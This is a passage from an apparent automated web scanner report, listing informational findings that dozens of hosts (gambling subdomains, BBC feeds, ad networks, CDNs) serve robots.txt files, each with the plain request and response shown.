Content-Type: text/plain
Last-Modified: Mon, 27 Jul 2009 12:44:56 GMT
Accept-Ranges: bytes
ETag: "347f77bb8eca1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:57:17 GMT
Connection: close

User-agent: *
Disallow: /

23.23. http://el.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://el.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: el.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:41 GMT
Accept-Ranges: bytes
ETag: "beb724dd47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:41 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.24. http://el.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://el.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: el.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=hlpfug4hs08levtjg01pme3sr4; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123010; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540394; expires=Tue, 15-May-2012 12:09:00 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:09:00 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.25. http://en.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:49 GMT
Accept-Ranges: bytes
ETag: "9a6eabe147b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:29 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.26. http://es.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: es.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:54 GMT
Accept-Ranges: bytes
ETag: "68d1f9e447b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:38 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.27. http://es.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: es.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=ap8djuc350n7b7mh3e9v4t94f6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123533; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540908; expires=Tue, 15-May-2012 12:32:31 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:32:32 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.28. http://feeds.bbci.co.uk/news/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=1615
Expires: Mon, 16 May 2011 13:12:23 GMT
Date: Mon, 16 May 2011 12:45:28 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

23.29. http://fi.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fi.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:05 GMT
Accept-Ranges: bytes
ETag: "3afc5aeb47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:07 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.30. http://fi.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fi.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fi.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=19b2tcaoa11llcdu2rsbmpv1i1; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123064; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540443; expires=Tue, 15-May-2012 12:11:14 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:11:14 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.31. http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fpdownload.macromedia.com
Path:   /pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fpdownload.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "2a203d-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 12:01:28 GMT
Connection: close

User-agent: *
Disallow: /

23.32. http://fr.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fr.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:10 GMT
Accept-Ranges: bytes
ETag: "bc23aeee47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:25:17 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.33. http://fr.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fr.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fr.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=2pn1lo6l06jkpa2geu5suvq3n6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123306; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540683; expires=Tue, 15-May-2012 12:26:50 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:51 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.34. http://getclicky.com/66384109

Summary

Severity:   Information
Confidence:   Certain
Host:   http://getclicky.com
Path:   /66384109

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:22 GMT
Server: Apache
Last-Modified: Thu, 24 May 2007 00:06:48 GMT
ETag: "958ba1-1f-4312c0f11f600"
Accept-Ranges: bytes
Content-Length: 31
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /stats/

23.35. http://gmpg.org/xfn/11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gmpg.org
Path:   /xfn/11

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gmpg.org

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:46:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_bwlimited/1.4
Last-Modified: Tue, 01 Feb 2005 10:15:39 GMT
ETag: "b240f0-19-3ef0a6a1b08c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.36. http://go.microsoft.com/fwlink/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.microsoft.com
Path:   /fwlink/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2005 18:42:43 GMT
Accept-Ranges: bytes
ETag: "a03b9f3726dbc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:12 GMT
Connection: keep-alive
Content-Length: 80

# Robots.txt file for http://go.microsoft.com
#

User-agent: *
Disallow: /

23.37. http://it.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: it.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:22 GMT
Accept-Ranges: bytes
ETag: "1ad556f547b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:30 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.38. http://itunes.apple.com/us/app/pclottery/id399201446

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/pclottery/id399201446

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 12 May 2011 14:44:51 GMT
ETag: "d1-4a3153b528b57"
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/plain
Cache-Control: public, no-transform, max-age=2258
Date: Mon, 16 May 2011 12:13:11 GMT
Connection: close
X-Apple-Partner: origin.0

User-agent: *
Disallow: /WebObjects/MZFastFinance.woa
Disallow: /WebObjects/MZFinance.woa
Disallow: /WebObjects/MZPersonalizer.woa
Disallow: /WebObjects/MZSidebar.woa
Disallow: /WebObjects/MZStoreElem
...[SNIP]...

23.39. http://jquery.org/license

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /license

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jquery.org

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:32:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://jquery.org/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

23.40. http://leandrovieira.com/projects/jquery/lightbox/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leandrovieira.com
Path:   /projects/jquery/lightbox/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: leandrovieira.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:42 GMT
Server: Apache
X-Pingback: http://leandrovieira.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

23.41. http://m.xp1.ru4.com/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 12:52:11 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

23.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Server: Apache
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=83052804
Expires: Wed, 01 Jan 2014 18:58:51 GMT
Date: Mon, 16 May 2011 12:45:27 GMT
Connection: close

User-agent: *
Disallow: /

23.43. http://nl.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nl.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:27 GMT
Accept-Ranges: bytes
ETag: "3473a0f847b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:17 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.44. http://nl.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nl.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nl.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=doqfealogfg6lt09dspfie0qd4; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123222; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540599; expires=Tue, 15-May-2012 12:24:40 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:40 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.45. http://no.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: no.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:39 GMT
Accept-Ranges: bytes
ETag: "4e987dff47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:30:37 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.46. http://no.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://no.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: no.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=smc59lrfc16srv72eal206nhe1; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123219; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540596; expires=Tue, 15-May-2012 12:24:34 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:34 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.47. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:49 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

23.48. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.49. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 17 May 2011 12:49:40 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 16 May 2011 12:49:40 GMT
Server: QS

User-agent: *
Disallow: /

23.50. http://pt.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pt.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:43 GMT
Accept-Ranges: bytes
ETag: "72ef1d248b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:30 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.51. http://pt.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pt.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pt.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=9ueg9jaeq5mfskpfc0obhjtf96; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123207; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540584; expires=Tue, 15-May-2012 12:24:22 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:23 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.52. http://pubads.g.doubleclick.net/pagead/adview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 12:52:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

23.53. http://s.mcstatic.com/Images/Studios/videogame/ChannelLogo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.mcstatic.com
Path:   /Images/Studios/videogame/ChannelLogo.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.mcstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 514
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer/
Disallow: /invitat
...[SNIP]...

23.54. http://s0.2mdn.net/879366/flashwrite_1_2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /879366/flashwrite_1_2.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 16 May 2011 00:01:58 GMT
Expires: Tue, 17 May 2011 00:01:58 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 44009

User-agent: *
Disallow: /

23.55. http://s1.mcstatic.com/JS12/Home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.mcstatic.com
Path:   /JS12/Home/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s1.mcstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 514
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:27 GMT
Connection: close

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer/
Disallow: /invitat
...[SNIP]...

23.56. http://s3.mcstatic.com/thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s3.mcstatic.com
Path:   /thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s3.mcstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 514
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer/
Disallow: /invitat
...[SNIP]...

23.57. http://s4.mcstatic.com/CSS/Global/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s4.mcstatic.com
Path:   /CSS/Global/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s4.mcstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 514
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:27 GMT
Connection: close

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer/
Disallow: /invitat
...[SNIP]...

23.58. http://s6.mcstatic.com/thumb/6289097/17948388/4/videos/0/1/l_a_noire_gameplay_series_3.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s6.mcstatic.com
Path:   /thumb/6289097/17948388/4/videos/0/1/l_a_noire_gameplay_series_3.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s6.mcstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 514
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer/
Disallow: /invitat
...[SNIP]...

23.59. http://safebrowsing.clients.google.com/safebrowsing/downloads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Mon, 16 May 2011 12:35:36 GMT
Expires: Mon, 16 May 2011 12:35:36 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

23.60. http://scratch.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: scratch.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:34 GMT
Server: Apache
Last-Modified: Mon, 20 Sep 2010 12:57:00 GMT
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /logging/

23.61. http://spe.atdmt.com/ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Wed, 18 May 2011 03:45:10 GMT
Date: Mon, 16 May 2011 12:52:12 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 16 May 2011 12:49:44 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

23.63. http://sv.crazyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.crazyscratch.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sv.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:48 GMT
Accept-Ranges: bytes
ETag: "8b64f548b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:23 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.64. http://sv.winnings.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.winnings.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sv.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=r4ms26lcld0out02d22uqik7m1; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123562; path=/; domain=.winnings.com
